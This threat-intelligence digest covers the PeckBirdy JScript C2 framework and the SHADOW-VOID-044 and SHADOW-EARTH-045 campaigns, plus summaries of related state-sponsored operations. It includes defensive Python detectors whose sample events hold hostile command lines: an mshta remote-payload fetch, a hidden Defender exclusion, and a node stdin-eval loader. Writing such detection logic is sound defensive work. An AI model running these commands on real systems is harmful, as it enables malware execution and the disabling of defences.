China-Linked APTs Deploy PeckBirdy JScript C2 Framework Since 2023
Summary
China-aligned APT actors have used PeckBirdy, a JScript/JavaScript-based command-and-control (C2) framework, since 2023 against Chinese gambling businesses, Asian government entities, and private organizations. PeckBirdy runs wherever a script engine is available, including web browsers, MSHTA, WScript, Classic ASP, Node.js, and .NET, and abuses living-off-the-land binaries (LOLBins) for execution; because its code is generated dynamically and injected at runtime, it leaves few file artifacts. It communicates over WebSocket by default and can fall back to Adobe Flash ActiveX objects or Comet-style HTTP long polling. Depending on where it runs it acts as a watering-hole controller, a reverse shell, or a C2 server, and its second-stage scripts can steal website cookies. Two campaigns have been identified, each with its own mix of credential harvesting and malware delivery. SHADOW-VOID-044 plants scripts on Chinese gambling websites that push fake Google Chrome updates to visitors, and has used stolen code-signing certificates to lend legitimacy to Cobalt Strike payloads alongside exploits including CVE-2020-16040 (a Google Chrome V8 vulnerability); infrastructure overlaps and shared tooling link it to UNC3569, a China-aligned group previously associated with the GRAYRABBIT backdoor. SHADOW-EARTH-045 targeted Asian government and private organizations, including a Philippine educational institution in July 2024, deployed the GRAYRABBIT and HOLODONUT backdoors, launched PeckBirdy from a custom .NET executable through the ScriptControl COM object, and shows weaker but notable overlaps with activity previously attributed to Earth Baxia. Additional PeckBirdy scripts handle exploitation, social engineering, and delivery of the HOLODONUT and MKDOOR backdoors. HOLODONUT disables AMSI before executing payloads in memory; MKDOOR disguises its traffic as Microsoft support or activation pages and tries to evade Microsoft Defender by altering its exclusion settings.
Timeline
- 27.01.2026 11:01 (3 articles): PeckBirdy Framework Used in Targeted Attacks Since 2023. Same account as the Summary above: PeckBirdy, a JScript-based C2 framework, used by China-aligned APT actors since 2023 in the SHADOW-VOID-044 and SHADOW-EARTH-045 campaigns.
Sources:
- China-Linked Hackers Have Used the PeckBirdy JavaScript C2 Framework Since 2023 — thehackernews.com — 27.01.2026 11:01
- PeckBirdy Framework Tied to China-Aligned Cyber Campaigns — www.infosecurity-magazine.com — 27.01.2026 18:00
- China-Backed 'PeckBirdy' Takes Flight for Cross-Platform Attacks — www.darkreading.com — 28.01.2026 18:19
Information Snippets
- PeckBirdy is a JScript-based C2 framework used by China-aligned APT actors since 2023. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- The framework has been used against Chinese gambling businesses, Asian government entities, and private organizations. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- PeckBirdy abuses living-off-the-land binaries (LOLBins) to run in whatever script environment is available on the target. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- Two campaigns, SHADOW-VOID-044 and SHADOW-EARTH-045, have been identified using PeckBirdy. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- SHADOW-VOID-044 plants malicious scripts on Chinese gambling websites that serve visitors fake Google Chrome updates. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- SHADOW-EARTH-045 targets Asian government entities and private organizations, including a Philippine educational institution. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- PeckBirdy communicates over WebSocket by default and can fall back to Adobe Flash ActiveX objects or Comet-style HTTP long polling. (First reported 27.01.2026 11:01; thehackernews.com)
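A check for the default transport described in the snippet above, added here as an example; it is not PeckBirdy code and not from any of the cited reports. It assumes the SOC has HTTP request/response pairs tagged with the originating process (a proxy or EDR network feed; the record field names are invented) and validates the RFC 6455 handshake so that only completed upgrades from Windows script hosts are flagged, rather than every attempt. The Flash ActiveX and Comet fallbacks need separate logic and are not covered.

```python
"""Added example: flag completed WebSocket upgrades initiated by Windows script
hosts. Not PeckBirdy code and not from any vendor; the flow records are
constructed and the field names (process, request, response) are assumptions.
Handshake validation follows RFC 6455: Sec-WebSocket-Accept must equal
base64(SHA-1(Sec-WebSocket-Key + GUID))."""
import base64
import hashlib

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed GUID from RFC 6455

# Script engines PeckBirdy is reported to run under. A browser opening a
# WebSocket is routine; one of these hosts doing so is worth a look
# (assumption: tune the set to what is normal in your estate).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "node.exe"}


def parse_headers(raw: str) -> dict:
    """Split a raw HTTP message head into {lowercased-name: value}; the
    request/status line is stored under the empty key."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {"": lines[0]}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def expected_accept(key: str) -> str:
    """Sec-WebSocket-Accept the server must return for a given client key."""
    digest = hashlib.sha1((key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def is_websocket_handshake(request: str, response: str) -> bool:
    """True only when the client requested an upgrade and the server completed
    it with a 101 and the correct accept value, i.e. a channel now exists."""
    req, resp = parse_headers(request), parse_headers(response)
    if "websocket" not in req.get("upgrade", "").lower():
        return False
    if not resp[""].startswith("HTTP/1.1 101"):
        return False
    return resp.get("sec-websocket-accept") == expected_accept(req.get("sec-websocket-key", ""))


def flag_script_host_websockets(flows):
    """Return (process, host, path) for every completed upgrade from a script host."""
    alerts = []
    for flow in flows:
        if flow["process"].lower() not in SCRIPT_HOSTS:
            continue
        if is_websocket_handshake(flow["request"], flow["response"]):
            req = parse_headers(flow["request"])
            alerts.append((flow["process"], req.get("host", "?"), req[""].split(" ")[1]))
    return alerts


# Constructed sample flows (not captured PeckBirdy traffic). The key/accept pair
# is the worked example from RFC 6455, so the first two handshakes verify.
_UPGRADE_REQ = ("GET /ws HTTP/1.1\r\nHost: c2.example.test\r\n"
                "Upgrade: websocket\r\nConnection: Upgrade\r\n"
                "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
                "Sec-WebSocket-Version: 13\r\n\r\n")
_UPGRADE_OK = ("HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\n"
               "Connection: Upgrade\r\n"
               "Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=\r\n\r\n")
SAMPLE_FLOWS = [
    {"process": "mshta.exe", "request": _UPGRADE_REQ, "response": _UPGRADE_OK},   # flagged
    {"process": "chrome.exe", "request": _UPGRADE_REQ, "response": _UPGRADE_OK},  # browser: normal
    {"process": "wscript.exe", "request": _UPGRADE_REQ,                           # refused: no channel
     "response": "HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"},
]

if __name__ == "__main__":
    for alert in flag_script_host_websockets(SAMPLE_FLOWS):
        print("script-host WebSocket channel:", alert)
```

Validating the accept value matters in practice: a blocked or misrouted upgrade attempt produces the same request headers as a live channel, and only the 101 with the matching Sec-WebSocket-Accept proves the operator's server answered.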
- The framework delivers second-stage scripts that can steal website cookies and perform other malicious actions. (First reported 27.01.2026 11:01; thehackernews.com)
- Additional scripts for exploitation, social engineering, and backdoor delivery have been observed. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- Two backdoors, HOLODONUT and MKDOOR, have been identified in association with the campaigns. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- SHADOW-VOID-044 and SHADOW-EARTH-045 are suspected to be operated by different China-aligned nation-state actors. (First reported 27.01.2026 11:01; thehackernews.com, infosecurity-magazine.com, darkreading.com)
- Depending on where it runs, PeckBirdy functions as a watering-hole controller, a reverse shell, or a C2 server. (First reported 27.01.2026 18:00; infosecurity-magazine.com, darkreading.com)
- HOLODONUT disables security features such as AMSI before executing payloads in memory. (First reported 27.01.2026 18:00; infosecurity-magazine.com, darkreading.com)
- MKDOOR disguises its network traffic as legitimate Microsoft support or activation pages and attempts to evade Microsoft Defender by altering its exclusion settings. (First reported 27.01.2026 18:00; infosecurity-magazine.com, darkreading.com)
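The exclusion tampering attributed to MKDOOR above is one of the few things in this cluster that shows up in telemetry every Windows estate already collects. The following is an added example, not MKDOOR code and not a vendor detection: it reads Microsoft Defender Antivirus event ID 5007 (configuration changed), whose message text names the registry value that changed, and process command lines (Security 4688 or Sysmon event 1) that invoke the Defender PowerShell cmdlets. The event records are constructed and the dictionary field names are assumptions.

```python
"""Added example: surface Microsoft Defender exclusion tampering of the kind
attributed to MKDOOR. Not MKDOOR code and not a vendor rule. It reads two
telemetry sources a SOC normally has: Defender Antivirus event ID 5007
(configuration changed), whose message lists the changed registry value, and
process command lines (Security 4688 or Sysmon 1) invoking the Defender
PowerShell cmdlets. The event records below are constructed; the event-dict
field names are assumptions."""
import re

# In a 5007 event an exclusion change appears in the "New value:" line as
# HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\<Paths|Processes|Extensions>\<value> = <data>
EXCLUSION_RE = re.compile(
    r"Windows Defender\\Exclusions\\(?P<kind>Paths|Processes|Extensions)\\(?P<value>[^=]+?)\s*=\s*\S+",
    re.IGNORECASE)
NEW_VALUE_RE = re.compile(r"New value:\s*(?P<rest>.+)", re.IGNORECASE)

# Command-line routes to the same settings.
CMDLINE_PATTERNS = [
    re.compile(r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.IGNORECASE),
    re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.IGNORECASE),
]


def exclusion_from_event(event: dict):
    """(kind, value) if a Defender 5007 event records a new exclusion, else None."""
    if event.get("provider") != "Microsoft-Windows-Windows Defender" or event.get("id") != 5007:
        return None
    line = NEW_VALUE_RE.search(event.get("message", ""))
    match = EXCLUSION_RE.search(line.group("rest")) if line else None
    if not match:
        return None
    return match.group("kind").lower(), match.group("value").strip()


def suspicious_cmdline(event: dict):
    """The command line if a process-creation event changes Defender preferences."""
    if event.get("id") not in (4688, 1):
        return None
    cmd = event.get("command_line", "")
    return cmd if any(p.search(cmd) for p in CMDLINE_PATTERNS) else None


def review(events):
    """Return (rule, host, detail) tuples for every matching event, in order."""
    alerts = []
    for e in events:
        exclusion = exclusion_from_event(e)
        if exclusion:
            alerts.append(("defender_exclusion_added", e["host"], f"{exclusion[0]}: {exclusion[1]}"))
        cmd = suspicious_cmdline(e)
        if cmd:
            alerts.append(("defender_preference_cmdline", e["host"], cmd))
    return alerts


_5007_TEXT = ("Microsoft Defender Antivirus Configuration has changed. If this is an "
              "unexpected event you should review the settings as this may be the "
              "result of malware.\n\tOld value: \n\tNew value: ")
SAMPLE_EVENTS = [  # constructed, not from a real incident
    {"host": "WS01", "provider": "Microsoft-Windows-Windows Defender", "id": 5007,
     "message": _5007_TEXT + "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Public\\Libraries = 0x0"},
    {"host": "WS01", "provider": "Microsoft-Windows-Windows Defender", "id": 5007,   # unrelated setting
     "message": _5007_TEXT + "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Scan\\ScanParameters = 0x2"},
    {"host": "WS01", "provider": "Microsoft-Windows-Sysmon", "id": 1,
     "command_line": "powershell.exe -nop -w hidden Add-MpPreference -ExclusionPath C:\\Users\\Public\\Libraries"},
    {"host": "WS01", "provider": "Microsoft-Windows-Sysmon", "id": 1,   # benign
     "command_line": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

if __name__ == "__main__":
    for alert in review(SAMPLE_EVENTS):
        print(*alert, sep=" | ")
```

Both sources are worth keeping: the 5007 event fires regardless of how the exclusion was written (cmdlet, direct registry edit, WMI), while the command-line rule catches the attempt even when the change is later reverted. The AMSI patching attributed to HOLODONUT leaves no comparable configuration event, since it happens in process memory; that needs script-block or ETW-level telemetry rather than this log.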
- Infrastructure overlaps and shared tooling suggest SHADOW-VOID-044 is linked with UNC3569, a China-aligned group previously associated with the GRAYRABBIT backdoor. (First reported 27.01.2026 18:00; infosecurity-magazine.com, darkreading.com)
- Some samples carried stolen code-signing certificates to lend legitimacy to malicious Cobalt Strike payloads. (First reported 27.01.2026 18:00; infosecurity-magazine.com, darkreading.com)
- SHADOW-EARTH-045 showed weaker but notable ties to activity previously attributed to Earth Baxia. (First reported 27.01.2026 18:00; infosecurity-magazine.com, darkreading.com)
- PeckBirdy is hard to detect because its code is generated dynamically and injected at runtime, leaving no persistent file artifacts. (First reported 28.01.2026 18:19; darkreading.com)
- PeckBirdy lets attackers abuse LOLBins to execute malicious activity across different execution environments. (First reported 28.01.2026 18:19; darkreading.com)
- The SHADOW-VOID-044 campaign used stolen code-signing certificates, Cobalt Strike payloads, and exploits, including CVE-2020-16040 (a Google Chrome V8 vulnerability), to compromise targets and maintain persistent access. (First reported 28.01.2026 18:19; darkreading.com)
- The SHADOW-EARTH-045 campaign targeted a Philippine educational institution in July 2024. (First reported 28.01.2026 18:19; darkreading.com)
- The SHADOW-EARTH-045 attackers used the GRAYRABBIT and HOLODONUT backdoors. (First reported 28.01.2026 18:19; darkreading.com)
- The SHADOW-EARTH-045 actor built a .NET executable that launches PeckBirdy through the ScriptControl COM object. (First reported 28.01.2026 18:19; darkreading.com)
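The snippets on LOLBin execution, the absence of file artifacts, and the .NET ScriptControl launcher all point at the same detection problem: there is no script on disk to scan, so the evidence is in how the script host was started and what it loaded. The following is an added example that serves all three snippets; it is not PeckBirdy code and not a vendor rule set. It triages Sysmon process-creation (event 1) and image-load (event 7) records using Sysmon's field names, and assumes (stated in the code) that nothing in the estate legitimately loads msscript.ocx, the library behind the ScriptControl COM object. The events are constructed.

```python
"""Added example: triage Sysmon process-creation (event 1) and image-load
(event 7) records for the script hosts PeckBirdy is reported to run under
(mshta, wscript/cscript, node, and a custom .NET launcher using ScriptControl).
Not PeckBirdy code and not a vendor rule set; events are constructed and use
Sysmon's field names (Image, CommandLine, ParentImage, ImageLoaded). Because
the framework builds its code at runtime and leaves no file behind, the rules
look at how the host was started and what it loaded, not at a script file."""
import re
from pathlib import PureWindowsPath

HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "node.exe"}
WSH = {"wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")
# The ScriptControl COM object is implemented in msscript.ocx (32-bit only).
# Assumption: nothing in this estate loads it legitimately, so any loader is reviewed.
SCRIPT_CONTROL_DLL = "msscript.ocx"

# (rule name, predicate over (image basename, command line, parent basename))
RULES = [
    ("mshta_remote_or_inline", lambda img, cmd, parent:
        img == "mshta.exe" and re.search(r"https?://|javascript:|vbscript:", cmd, re.I)),
    ("wsh_engine_override", lambda img, cmd, parent:      # //E:JScript forces the engine for any extension
        img in WSH and re.search(r"//?e:(jscript|vbscript)", cmd, re.I)),
    ("wsh_script_in_user_path", lambda img, cmd, parent:  # noisy where logon scripts live in user paths
        img in WSH and any(p in cmd.lower() for p in USER_WRITABLE)),
    ("node_inline_eval", lambda img, cmd, parent:
        img == "node.exe" and re.search(r"\s(-e|--eval)\s", cmd)),
    ("script_host_spawned_by_browser", lambda img, cmd, parent:
        img in HOSTS and parent in BROWSERS),
]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for empty)."""
    return PureWindowsPath(path).name.lower()


def triage(events):
    """Return (rule, host, image, detail) for every matching event, in input order."""
    hits = []
    for e in events:
        if e["id"] == 1:
            img, cmd, parent = base(e["Image"]), e.get("CommandLine", ""), base(e.get("ParentImage", ""))
            for name, pred in RULES:
                if pred(img, cmd, parent):
                    hits.append((name, e["host"], img, cmd))
        elif e["id"] == 7 and base(e["ImageLoaded"]) == SCRIPT_CONTROL_DLL:
            hits.append(("scriptcontrol_loaded", e["host"], base(e["Image"]), e["Image"]))
    return hits


SAMPLE_EVENTS = [  # constructed, not from a real intrusion
    {"host": "WS01", "id": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://update.example.test/chrome_update.hta",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"host": "WS01", "id": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //E:JScript C:\Users\Public\Libraries\sync.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"host": "WS01", "id": 1, "Image": r"C:\Windows\System32\cscript.exe",   # benign admin use
     "CommandLine": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"host": "WS02", "id": 7, "Image": r"C:\Users\Public\Libraries\Updater.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\msscript.ocx"},
    {"host": "WS02", "id": 1, "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "node.exe -e \"process.stdin.on('data', d => eval(String(d)))\"",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(*hit, sep=" | ")
```

The rules are deliberately about launch context rather than content: a remote URL handed to mshta, an engine override that lets WScript run JScript from a file with a harmless extension, a script host whose parent is a browser, and an unexpected loader of msscript.ocx. The user-path rule will need an allow-list in estates that run logon scripts from user-writable locations.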
Similar Happenings
Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats
A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows shortcut (LNK) zero-day tracked as CVE-2025-9491 to target European diplomats in Hungary, Belgium, Italy, and the Netherlands, as well as Serbian government agencies. The campaign uses spearphishing emails carrying malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems, and has broadened to include diplomatic entities in Italy and the Netherlands. The flaw lets a crafted shortcut hide its real command line from the user, so opening it runs attacker code; the group uses this to monitor diplomatic communications and steal sensitive data. Microsoft has not released a dedicated patch for the vulnerability, which multiple state-sponsored groups and cybercrime gangs have exploited heavily since March 2025; instead, the November updates quietly changed LNK handling so that the Target field displays all of its characters rather than only the first 260. ACROS Security has also released an unofficial patch that limits shortcut target strings to 260 characters and warns users about potentially dangerous shortcuts.
Russian Sandworm Group Targets Ukrainian Organizations with Data-Wiping Malware and LotL Tactics
Russian threat actors, specifically the Sandworm group, have targeted Ukrainian organizations and Poland's power sector using living-off-the-land (LotL) tactics and deploying data-wiping malware. The attacks, which began in June 2025, involved minimal malware to reduce detection and included the use of web shells and legitimate tools for reconnaissance and data theft. The threat actors exploited unpatched vulnerabilities to deploy web shells on public-facing servers, gaining initial access. They then used various tactics, including PowerShell commands, scheduled tasks, and legitimate software, to evade detection and perform reconnaissance. The attacks were characterized by the use of legitimate tools and minimal malware, demonstrating the actors' deep knowledge of Windows native tools. In addition to LotL tactics, Sandworm deployed multiple data-wiping malware families in June and September 2025, targeting Ukraine's education, government, and grain sectors. The grain sector, a vital economic sector, was targeted to disrupt Ukraine's war economy. The data-wiping malware used included ZeroLot and Sting, with initial access achieved by UAC-0099, who then transferred access to APT44 for wiper deployment. The activity is confirmed to be of Russian origin, with specific attribution to the Sandworm group. In December 2025, Sandworm targeted Poland's power sector with a new wiper malware called DynoWiper, aiming to disrupt the energy infrastructure. The attack, which occurred on December 29 and 30, 2025, targeted two combined heat and power (CHP) plants and a system managing renewable energy sources. The attack was unsuccessful in causing disruption, and Polish authorities attributed it to Russian services. The attack coincided with the tenth anniversary of Sandworm's 2015 attack on Ukraine's power grid. A new Russia-aligned threat activity cluster, InedibleOchotense, impersonated ESET in phishing attacks targeting Ukrainian entities starting in May 2025. 
This campaign involved sending spear-phishing emails and Signal text messages containing links to trojanized ESET installers, which delivered the Kalambur backdoor. InedibleOchotense is linked to the Sandworm (APT44) hacking group and has been observed conducting destructive campaigns in Ukraine, including the deployment of wiper malware ZEROLOT and Sting. Another Russia-aligned threat actor, RomCom, launched spear-phishing campaigns in mid-July 2025 exploiting a WinRAR vulnerability (CVE-2025-8088) targeting various sectors in Europe and Canada. RomCom also targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. The targeted entity had worked for a city with close ties to Ukraine in the past. The ESET report noted that other Russian-aligned APT groups also maintained their focus on Ukraine and countries with strategic ties to Ukraine, while also expanding their operations to European entities. Gamaredon remained the most active APT group targeting Ukraine, with a noticeable increase in intensity and frequency of its operations during the reported period. Gamaredon selectively deployed one of Turla’s backdoors, indicating a rare instance of cooperation between Russia-aligned APT groups. Gamaredon’s toolset continued to evolve, incorporating new file stealers or tunneling services. The cyber attack on the Polish power grid in December 2025 was attributed with medium confidence to a Russian state-sponsored hacking group known as ELECTRUM. The attack targeted distributed energy resources (DERs) and affected communication and control systems at combined heat and power (CHP) facilities and systems managing renewable energy systems. 
ELECTRUM and KAMACITE share overlaps with the Sandworm cluster, with KAMACITE focusing on initial access and ELECTRUM conducting operations that bridge IT and OT environments. The attackers gained access to operational technology systems critical to grid operations and disabled key equipment beyond repair at the site. The attack was opportunistic and rushed, with the hackers attempting to inflict as much damage as possible by wiping Windows-based devices and resetting configurations. The majority of the equipment targeted was related to grid safety and stability monitoring. The coordinated attack on Poland's power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. Although the attacker compromised operational technology (OT) systems damaging "key equipment beyond repair," they failed to disrupt power, totaling 1.2 GW or 5% of Poland’s energy supply. Based on public reports, there are at least 12 confirmed affected sites. However, researchers at Dragos, a critical industrial infrastructure (OT) and control systems (ICS) security company say that the number is approximately 30. Dragos attributes the attack with moderate confidence to a Russian threat actor it tracks as Electrum, which, although it overlaps with Sandworm (APT44), the researchers underline that it is a distinct activity cluster. Electrum targeted exposed and vulnerable systems involved in dispatch and grid-facing communication, remote terminal units (RTUs), network edge devices, monitoring and control systems, and Windows-based machines at DER sites. Electrum successfully disabled communications equipment at multiple sites, resulting in a loss of remote monitoring and control, but power generation on the units continued without interruption. 
Certain OT/ICS devices were disabled, and their configurations were corrupted beyond recovery, while Windows systems at the sites were wiped. Even if the attacks had been successful in cutting the power, the relatively narrow targeting scope wouldn’t have been enough to cause a nationwide blackout in Poland. However, they could have caused significant destabilization of the system frequency. "Such frequency deviations have caused cascading failures in other electrical systems, including the 2025 Iberian grid collapse," the researchers say.
Exploitation of Ivanti EPMM Vulnerabilities (CVE-2025-4427, CVE-2025-4428) Leads to Malware Deployment
Two malware strains were discovered in an organization's network after attackers exploited two zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM). The vulnerabilities, CVE-2025-4427 and CVE-2025-4428, allow for authentication bypass and remote code execution, respectively. Attackers used these flaws to gain access to the EPMM server, execute arbitrary code, and maintain persistence. The attack began around May 15, 2025, following the publication of a proof-of-concept exploit. The malware sets include loaders that enable arbitrary code execution and data exfiltration. The vulnerabilities affect Ivanti EPMM development branches 11.12.0.4, 12.3.0.1, 12.4.0.1, and 12.5.0.0 and their earlier releases. A China-nexus espionage group was leveraging the vulnerabilities since at least May 15, 2025. The threat actor targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The malware sets include distinct loaders with the same name, and malicious listeners that allow injecting and running arbitrary code on the compromised system. The threat actor delivered the malware through separate HTTP GET requests in segmented, Base64-encoded chunks. Organizations are advised to update their EPMM instances, monitor for suspicious activity, and implement access restrictions to prevent unauthorized access to mobile device management systems.
Chinese Malware Campaigns Exploit SEO and GitHub Pages to Distribute HiddenGh0st, Winos, and kkRAT
Chinese-speaking users are targeted by a malware campaign using SEO poisoning and fake software sites to distribute HiddenGh0st, Winos, and kkRAT. The campaign manipulates search rankings and uses trojanized installers to deliver the malware. The attacks exploit vulnerabilities in popular software and use various techniques to evade detection and maintain persistence. The malware is designed to establish command-and-control communication, monitor user activity, and steal sensitive information. The threat actor Dragon Breath, also known as APT-Q-27 and Golden Eye, uses RONINGLOADER to deliver a modified variant of Gh0st RAT. The campaign employs trojanized NSIS installers masquerading as legitimate software like Google Chrome and Microsoft Teams. The malware targets specific antivirus programs, including Microsoft Defender Antivirus, Kingsoft Internet Security, Tencent PC Manager, and Qihoo 360 Total Security. The malware uses a Bring Your Own Vulnerable Driver (BYOVD) technique to disarm antivirus software. The final malware deployed is a modified version of Gh0st RAT, designed to communicate with a remote server to fetch additional instructions. The campaign was discovered in August 2025 and involves multiple malware families, including HiddenGh0st and Winos, which are variants of Gh0st RAT. The attacks use fake software sites and GitHub Pages to distribute the malware, exploiting the trust associated with legitimate platforms. The malware employs sophisticated techniques to evade detection and maintain persistence, including anti-analysis checks and TypeLib COM hijacking. Two interconnected malware campaigns, Campaign Trio and Campaign Chorus, have employed large-scale brand impersonation to deliver Gh0st RAT to Chinese-speaking users. Additionally, a new sample of the ToneShell backdoor, typically seen in Chinese cyberespionage campaigns, has been delivered through a kernel-mode loader in attacks against government organizations. 
The backdoor has been attributed to the Mustang Panda group, also known as HoneyMyte or Bronze President, that usually targets government agencies, NGOs, think tanks, and other high-profile organizations worldwide. The new variant of the ToneShell backdoor features changes and stealth enhancements, including a new host identification scheme and network traffic obfuscation with fake TLS headers. The driver file is signed with an old, stolen, or leaked digital certificate from Guangzhou Kingteller Technology Co., Ltd, valid from August 2012 to 2015. The driver registers as a minifilter driver on infected machines, injecting a backdoor trojan into system processes and providing protection for malicious files, user-mode processes, and registry keys. The driver resolves required kernel APIs dynamically at runtime by using a hashing algorithm to match the required API addresses. The driver monitors file-delete and file-rename operations to prevent itself from being removed or renamed. The driver denies attempts to create or open Registry keys that match against a protected list by setting up a RegistryCallback routine and ensuring that it operates at an altitude of 330024 or higher. The driver interferes with the altitude assigned to WdFilter.sys, a Microsoft Defender driver, changing it to zero, thereby preventing it from being loaded into the I/O stack. The driver intercepts process-related operations and denies access if the action targets any process that's on a list of protected process IDs when they are running. The driver removes rootkit protection for those processes once execution completes. The driver drops two user-mode payloads, one of which spawns an "svchost.exe" process and injects a small delay-inducing shellcode. The second payload is the TONESHELL backdoor that's injected into that same "svchost.exe" process. 
Once launched, the backdoor establishes contact with a C2 server ("avocadomechanism[.]com" or "potherbreference[.]com") over TCP on port 443, using the communication channel to receive commands. The backdoor commands include creating temporary files for incoming data, downloading files, canceling downloads, establishing a remote shell via pipe, receiving operator commands, terminating the shell, uploading files, canceling uploads, and closing the connection. The use of TONESHELL has been attributed to Mustang Panda since at least late 2022. As recently as September 2025, the threat actor was linked to attacks targeting Thai entities with TONESHELL and a USB worm named TONEDISK (aka WispRider) that uses removable devices as a distribution vector for a backdoor referred to as Yokai. The C2 infrastructure used for TONESHELL was erected in September 2024, although there are indications that the campaign itself did not commence until February 2025. The exact initial access pathway used in the attack is not clear, but it's suspected that the attackers abused previously compromised machines to deploy the malicious driver. Memory forensics is key to analyzing the new TONESHELL infections, as the shellcode executes entirely in memory. HoneyMyte's 2025 operations show a noticeable evolution toward using kernel-mode injectors to deploy ToneShell, improving both stealth and resilience. The Chinese espionage threat group Mustang Panda has updated its CoolClient backdoor to a new variant that can steal login data from browsers and monitor the clipboard. CoolClient has been associated with Mustang Panda since 2022, deployed as a secondary backdoor alongside PlugX and LuminousMoth. The updated malware version has been observed in attacks targeting government entities in Myanmar, Mongolia, Malaysia, Russia, and Pakistan and were deployed via legitimate software from Sangfor, a Chinese company specialized in cybersecurity, cloud computing, and IT infrastructure products. 
CoolClient uses encrypted .DAT files in a multi-stage execution and achieves persistence via Registry modifications, the addition of new Windows services, and scheduled tasks. It also supports UAC bypassing and privilege escalation. CoolClient's core features are integrated in a DLL embedded in a file called main.dat. When launched, it first checks whether the keylogger, clipboard stealer, and HTTP proxy credential sniffer are enabled. New CoolClient capabilities include a clipboard monitoring module, the ability to perform active window title tracking, and HTTP proxy credential sniffing that relies on raw packet inspection and headers extraction. The plugin ecosystem has been expanded with a dedicated remote shell plugin, a service management plugin, and a more capable file management plugin. The service management plugin allows the operators to enumerate, create, start, stop, delete, and modify the startup configuration of Windows services. The file management plugin provides extended file operations, including drive enumeration, file search, ZIP compression, network drive mapping, and file execution. Remote shell functionality is implemented via a separate plugin that spawns a hidden cmd.exe process and redirects its standard input and output through pipes, enabling interactive command execution over the command-and-control (C2) channel. A novelty in CoolClient’s operation is the deployment of infostealers to collect login data from browsers. Kaspersky documented three distinct families targeting Chrome (variant A), Edge (variant B), and a more versatile variant C that targets any Chromium-based browser. Another notable operational shift is that browser data theft and document exfiltration now leverage hardcoded API tokens for legitimate public services like Google Drive or Pixeldrain to evade detection.
EggStreme Fileless Malware Used in Philippine Military Breach
A Chinese APT group has breached a Philippine military company using a previously undocumented fileless malware framework called EggStreme. The malware framework facilitates persistent, low-profile espionage through memory injection and DLL sideloading. The attack began in early 2024 and includes extensive system reconnaissance, lateral movement, and data theft. The EggStreme framework comprises multiple components: EggStremeFuel, EggStremeLoader, EggStremeReflectiveLoader, and EggStremeAgent. The core component, EggStremeAgent, acts as a backdoor enabling system reconnaissance, lateral movement, and data theft via an injected keylogger. The attack aligns with Chinese APT objectives, targeting the Philippines amid geopolitical tensions in the South China Sea.